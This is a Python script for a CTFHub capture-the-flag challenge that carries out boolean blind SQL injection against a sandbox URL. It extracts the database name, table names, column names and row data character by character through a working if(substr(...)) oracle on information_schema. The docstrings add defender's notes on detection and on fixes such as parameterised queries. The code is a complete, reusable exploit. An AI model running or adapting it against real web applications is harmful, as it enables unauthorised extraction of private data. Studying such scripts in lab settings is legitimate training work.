CTFHub布尔盲注脚本
import requests
import string
def get_database(url, mark):
    """Recover the current schema name one character at a time over HTTP.

    Each probe appends a MySQL ``if(...)`` expression to ``url``. When the
    guessed character is right the true branch (``1``) is evaluated and the
    response contains ``mark``; otherwise the false branch runs a multi-row
    subquery on ``information_schema.tables``, which makes the query fail and
    the page differ. Only the presence of ``mark`` is inspected, so this is a
    pure yes/no oracle: up to 52 requests per character, eight characters.

    Args:
        url: base URL ending in the injectable query parameter (``...?id=``).
        mark: substring that appears in the response only on the "true" path.

    Returns:
        The characters matched so far (at most 8; positions that match no
        ASCII letter are silently skipped, so the result may be shorter than
        the real name).

    Defender's note: every probe carries ``database()`` and
    ``information_schema`` in the query string and produces a long run of
    near-identical requests from one client, which is what a WAF or request
    log would flag. The root cause is a query built from unvalidated input;
    parameterised statements and uniform error handling close the oracle.
    """
    # Nesting below is reconstructed from a whitespace-flattened paste.
    database = ''
    for i in range(1, 9):
        for j in string.ascii_letters:
            # '%' binds tighter than '+', so only the literal is formatted.
            target = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            # NOTE(review): no timeout — a stalled server blocks the loop indefinitely.
            r = requests.get(target)
            if mark in r.text:
                database += j
                print(database)
                break  # first matching letter wins; move to the next position
    print('Database:', database)
    return database
def get_table(url, mark, database):
    """Enumerate the first two table names of ``database`` and let the user pick one.

    Same yes/no oracle as ``get_database``: for table index ``i`` (``limit i,1``)
    and character position ``j`` (1..5), each ASCII letter is tried until the
    response contains ``mark``. Names longer than five characters, or containing
    digits/underscores, are truncated or have positions skipped.

    Args:
        url: base URL ending in the injectable query parameter.
        mark: substring present in the response only on the "true" path.
        database: schema name as recovered by ``get_database``; it is spliced
            into the probe verbatim, so a name containing ``"`` would break
            the probe query.

    Returns:
        Whatever the operator types at the ``input`` prompt — the collected
        ``tablesname`` list is only printed, never returned.

    Defender's note: the probes reference ``information_schema.tables`` with
    ``table_schema`` filtering; access to ``information_schema`` from the
    application's DB account and a verbose/differing error page are the two
    properties this relies on.
    """
    # Nesting below is reconstructed from a whitespace-flattened paste.
    tablesname = []
    for i in range(0, 2):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                # Only the final string literal is %-formatted (operator precedence);
                # it holds the three placeholders for (i, j, k).
                target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\
                database + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                # NOTE(review): no timeout on the request.
                r = requests.get(target)
                if mark in r.text:
                    name += k
                    print(name)
                    break
        # presumably appended once per table (after the position loop) — inferred from the flattened layout
        tablesname.append(name)
    print('Tablesame:', tablesname)
    return input("Choose TableName:")
def get_columns(url, mark, tablename, database):
    """Enumerate the first three column names of ``tablename`` and let the user pick one.

    Mirrors ``get_table`` but reads ``information_schema.columns`` filtered by
    ``table_name`` and ``table_schema``. Column index ``i`` comes from
    ``limit i,1``; positions 1..5 are probed with ASCII letters only, so longer
    names or names with digits/underscores come back incomplete.

    Args:
        url: base URL ending in the injectable query parameter.
        mark: substring present in the response only on the "true" path.
        tablename: table chosen at the previous ``input`` prompt; spliced into
            the probe verbatim (no quoting or validation).
        database: schema name; likewise spliced verbatim.

    Returns:
        The operator's answer to the ``input`` prompt; the ``columns`` list is
        printed only.

    Defender's note: as with the other probes, the request volume (up to 52
    per character) and the ``information_schema.columns`` reference are the
    observable signature; prepared statements remove the injection point
    entirely.
    """
    # Nesting below is reconstructed from a whitespace-flattened paste.
    columns = []
    for i in range(0, 3):
        name = ''
        for j in range(1, 6):
            for k in string.ascii_letters:
                # Only the last literal is %-formatted; it carries the (i, j, k) placeholders.
                target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\
                + tablename + '" and table_schema="' + database\
                + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                # NOTE(review): no timeout on the request.
                r = requests.get(target)
                if mark in r.text:
                    name += k
                    print(name)
                    break
        # presumably appended once per column, after the position loop — inferred from the flattened layout
        columns.append(name)
    print('Columnsname:', columns)
    return input("Choose Columnname:")
def getdata(url,mark,tablename,database,columns):
    """Read the value of ``columns`` from ``tablename`` character by character.

    Probes ``substr((select <columns> from <tablename>), i, 1)`` for
    ``i`` in 0..49 against digits, ASCII letters and punctuation (94 candidates
    per position), appending a candidate to ``data`` as soon as ``mark`` shows
    up in the response. Progress is printed after every matched character and
    the final value is printed at the end; nothing is returned.

    Args:
        url: base URL ending in the injectable query parameter.
        mark: substring present in the response only on the "true" path.
        tablename: table chosen by the operator; spliced verbatim into the probe.
        database: unused here (kept for signature symmetry with the callers).
        columns: column chosen by the operator; spliced verbatim into the probe.

    Note: ``string.punctuation`` includes ``"``, so that candidate produces a
    malformed probe query rather than a real comparison; ``%`` candidates are
    passed as literal characters, not format directives, because formatting has
    already happened.

    Defender's note: this phase is the highest-volume one (up to 94 requests
    per character, 50 positions) and is the stage where actual row data leaves
    the database, so rate limiting and alerting on ``information_schema``
    references in query strings pay off most here.
    """
    # Nesting below is reconstructed from a whitespace-flattened paste.
    data = ''
    for i in range(0, 50):
        for j in string.digits\
        + string.ascii_letters\
        + string.punctuation:
            # The concatenation is evaluated left to right, but '%' is applied
            # to the final literal alone before any '+' runs.
            payload = url + 'if(substr((select '\
            +columns\
            + ' from ' + tablename\
            + '),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            # NOTE(review): no timeout on the request.
            request = requests.get(payload)
            if mark in request.text:
                data += j
                print(data)
                break
    print(data)
if __name__ == "__main__":
    # Script entry point: the four phases run in order, with two interactive
    # prompts (table, then column) in between. `url` ends in the injectable
    # parameter and `mark` is the response token that distinguishes the
    # "true" branch; both are specific to this challenge instance.
    url = "http://challenge-1d65b510fd09970c.sandbox.ctfhub.com:10080/?id="
    mark = "query_success"
    database = get_database(url, mark)
    tablename = get_table(url, mark, database)
    columns=get_columns(url, mark, tablename, database)
    getdata(url, mark, tablename, database,columns)